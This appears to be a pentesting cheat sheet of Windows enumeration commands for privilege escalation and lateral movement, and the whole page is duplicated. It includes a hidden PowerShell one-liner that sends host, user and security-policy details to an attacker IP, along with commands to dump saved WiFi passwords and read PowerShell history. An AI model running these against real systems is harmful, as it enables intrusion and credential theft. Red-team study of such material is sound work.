Windows

Introduction

This section contains some useful commands that will help you enumerate the Windows system, obtaining helpful information for a later Privilege Escalation or Lateral movements.

General information exfiltration

C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"

PowerShell History

c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

User and group enumeration

whoami
echo %username%

Privileges

Displays the current user name and groups to which the user belongs and the security identifiers (SIDs), notifications and privileges for the current user's access token.

whoami /all

Enumerate the SE privileges of the current user

whoami /priv

Groups

net localgroup
net localgroup "<Group>"
# View Domain Groups
net "<Group>" /domain

Operative system

Architecture:

wmic os get osarchitecture

General information:

ver
systeminfo

Environment variables:

cmd /c set

Hostname & Domain

echo %USERDOMAIN% -> Returns domain name
systeminfo | findstr /B /C:"Domain"

Get-WMIObject Win32_ComputerSystem | Select-Object Name, Domain

Network enumeration

Hardcoded domains:

The file /etc/hosts also exist on Windows under the following path.

C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

Port enumeration:

netstat -ano

Display routing table:

route print

Network configuration:

ipconfig /all

Shares:

net share
net1 share

SMB Signing enabled

Get-SmbServerConfiguration | select EnableSecuritySignature

View computers on your network:

net view

Status Firewall / AV / Windows Defender

# Status windefender
sc query windefend 

# Status firewall
netsh firewall show state 
netsh firewall show config
netsh advfirewall show allprofiles

# Deprecated command
netsh advfirewall firewall dump

# Check if Windows Defender is enabled
Get-MpComputerStatus

# Check if firewall it is enabled
Get-NetFirewallProfile | Select-Object Name,Enabled

# Allowed Firewall Ports
Get-NetFirewallRule | Get-NetFirewallPortFilter | Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -ne 'Any' }  

# Blocked ports/applications
Get-NetFirewallRule -PolicyStore ActiveStore | where {$_.Action -eq "Block"}

WiFi Passwords: On windows 10 we can obtain WiFi Passwords for each AP that the computer has ever connected.

1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear

Show ARP tables:

arp -a

Constrained Language Enabled (CLM)

Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.

$ExecutionContext.SessionState.LanguageMode
# If enabled it wouldn't work
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")

AMSI

AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.

There are several ways to check if AMSI is enabled:

# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'

# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

AppLocker

AppLocker is a security feature in Windows operating systems that allows administrators to control which applications and executable files are allowed to run on a system. It provides a way to define and enforce application whitelisting policies, helping organizations enhance their security by preventing the execution of unauthorized or potentially malicious software.

You can check if AppLocker is enabled with the following command.

ApGet-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status

Obtain AppLocker rules:

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize

Files Enumeration

PowerShell History

type c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

Disks

There are several ways to obtain the mounted disks on the system.

# CMD
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem

Name           Used (GB)     Free (GB) Provider      Root  CurrentLocation
----           ---------     --------- --------      ----  ---------------
C                  19,69          9,70 FileSystem    C:\   Users
W                   2,52         17,48 FileSystem    W:\

Alternate Data Streams

Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this system, a file is built up from a couple of attributes, one of them is $Data, also known as the data attribute. Looking at the regular data stream of a text file there is no mystery. It simply contains the text inside the text file. But that is only the primary data stream.

This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( "" ). So any data stream that has a name is considered an alternate.

Find Data Alternate Streams in a directory.

dir /r

If you want to search a directory or drive for ADS you can use this command in the root of the target:

gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

Adding data to an alternate data stream.

echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe | prueba.txt:pepe

Read Alternate Data Streams.

gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden

Permissions

Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.

# Directory permissions
Get-acl C:\backup\Scripts\* | Format-Table -Wrap -Autosize 
# Directory / File permissions
icacls "<Path>"

Simple Rights

Mask

Permission

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Specific Rights

Mask

Permission

Delete

Read control

WDAC

Write DAC

Write Owner

Synchronize

Access System security

Maximum Allowed

Generic Read

Generic Write

Generic Execute

Generic All

Read Data / List Directory

Write Data / Add File

Append Data / Add subdirectory

REA

Read Extended Attributes

WEA

Writer Extended Attributes

Execute

Delete Child

Read Attributes

Write Attributes

Inheritance righsts (Applied only to directories)

Mask

Permission

Object Inherit

Container Inherit

Inherit Only

Do not propagate inherit

Permission inherited from parent container

Service rights

The first letter represents Allow (A) the opposite of Deny which would be represented by a (D).

Mask

Permission

Meaning

SERVICE QUERY CONFIG

Ask the SCM for the service’s current configuration

SERVICE QUERY STATUS

Ask the SCM for the service’s current status

SERVICE ENUMERATE DEPENDENTS

List dependent services

SERVICE INTERROGATE

Ask the service its current status

SERVICE USER_DEFINED CONTROL

Send a service control defined by the service’s author

READ CONTROL

Read the security descriptor on this service.

SERVICE START

Start the service

Service stop

Stop the service

Service Pause continue

Pause or continue the service

List Installed HotFixes

List all installed patches on the system.

Get-Hotfix

Running processes

tasklist

Scheduled Tasks

List/enumerate all the scheduled tasks present on the system.

(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName <Full Path>

Last updated 2 months ago

Windows

Introduction

This section contains some useful commands that will help you enumerate the Windows system, obtaining helpful information for a later Privilege Escalation or Lateral movements.

General information exfiltration

C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"

PowerShell History

c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

User and group enumeration

whoami
echo %username%

Privileges

Displays the current user name and groups to which the user belongs and the security identifiers (SIDs), notifications and privileges for the current user's access token.

whoami /all

Enumerate the SE privileges of the current user

whoami /priv

Groups

net localgroup
net localgroup "<Group>"
# View Domain Groups
net "<Group>" /domain

Operative system

Architecture:

wmic os get osarchitecture

General information:

ver
systeminfo

Environment variables:

cmd /c set

Hostname & Domain

echo %USERDOMAIN% -> Returns domain name
systeminfo | findstr /B /C:"Domain"

Get-WMIObject Win32_ComputerSystem | Select-Object Name, Domain

Network enumeration

Hardcoded domains:

The file /etc/hosts also exist on Windows under the following path.

C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

Port enumeration:

netstat -ano

Display routing table:

route print

Network configuration:

ipconfig /all

Shares:

net share
net1 share

SMB Signing enabled

Get-SmbServerConfiguration | select EnableSecuritySignature

View computers on your network:

net view

Status Firewall / AV / Windows Defender

# Status windefender
sc query windefend 

# Status firewall
netsh firewall show state 
netsh firewall show config
netsh advfirewall show allprofiles

# Deprecated command
netsh advfirewall firewall dump

# Check if Windows Defender is enabled
Get-MpComputerStatus

# Check if firewall it is enabled
Get-NetFirewallProfile | Select-Object Name,Enabled

# Allowed Firewall Ports
Get-NetFirewallRule | Get-NetFirewallPortFilter | Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -ne 'Any' }  

# Blocked ports/applications
Get-NetFirewallRule -PolicyStore ActiveStore | where {$_.Action -eq "Block"}

WiFi Passwords: On windows 10 we can obtain WiFi Passwords for each AP that the computer has ever connected.

1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear

Show ARP tables:

arp -a

Constrained Language Enabled (CLM)

$ExecutionContext.SessionState.LanguageMode
# If enabled it wouldn't work
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")

To bypass this countermeasure go to

AMSI

AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.

There are several ways to check if AMSI is enabled:

# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'

# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

To bypass this countermeasure go to

AppLocker

You can check if AppLocker is enabled with the following command.

ApGet-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status

Obtain AppLocker rules:

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize

To bypass this countermeasure go to .

Files Enumeration

PowerShell History

type c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

Disks

There are several ways to obtain the mounted disks on the system.

# CMD
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem

Name           Used (GB)     Free (GB) Provider      Root  CurrentLocation
----           ---------     --------- --------      ----  ---------------
C                  19,69          9,70 FileSystem    C:\   Users
W                   2,52         17,48 FileSystem    W:\

Alternate Data Streams

This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( "" ). So any data stream that has a name is considered an alternate.

Find Data Alternate Streams in a directory.

dir /r

If you want to search a directory or drive for ADS you can use this command in the root of the target:

gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

Adding data to an alternate data stream.

echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe | prueba.txt:pepe

Read Alternate Data Streams.

gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden

Permissions

Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.

# Directory permissions
Get-acl C:\backup\Scripts\* | Format-Table -Wrap -Autosize 
# Directory / File permissions
icacls "<Path>"

Simple Rights

Mask

Permission

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Specific Rights

Mask

Permission

Delete

Read control

WDAC

Write DAC

Write Owner

Synchronize

Access System security

Maximum Allowed

Generic Read

Generic Write

Generic Execute

Generic All

Read Data / List Directory

Write Data / Add File

Append Data / Add subdirectory

REA

Read Extended Attributes

WEA

Writer Extended Attributes

Execute

Delete Child

Read Attributes

Write Attributes

Inheritance righsts (Applied only to directories)

Mask

Permission

Object Inherit

Container Inherit

Inherit Only

Do not propagate inherit

Permission inherited from parent container

Service rights

The first letter represents Allow (A) the opposite of Deny which would be represented by a (D).

Mask

Permission

Meaning

SERVICE QUERY CONFIG

Ask the SCM for the service’s current configuration

SERVICE QUERY STATUS

Ask the SCM for the service’s current status

SERVICE ENUMERATE DEPENDENTS

List dependent services

SERVICE INTERROGATE

Ask the service its current status

SERVICE USER_DEFINED CONTROL

Send a service control defined by the service’s author

READ CONTROL

Read the security descriptor on this service.

SERVICE START

Start the service

Service stop

Stop the service

Service Pause continue

Pause or continue the service

List Installed HotFixes

List all installed patches on the system.

Get-Hotfix

Running processes

tasklist

Scheduled Tasks

List/enumerate all the scheduled tasks present on the system.

(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName <Full Path>

Last updated 2 months ago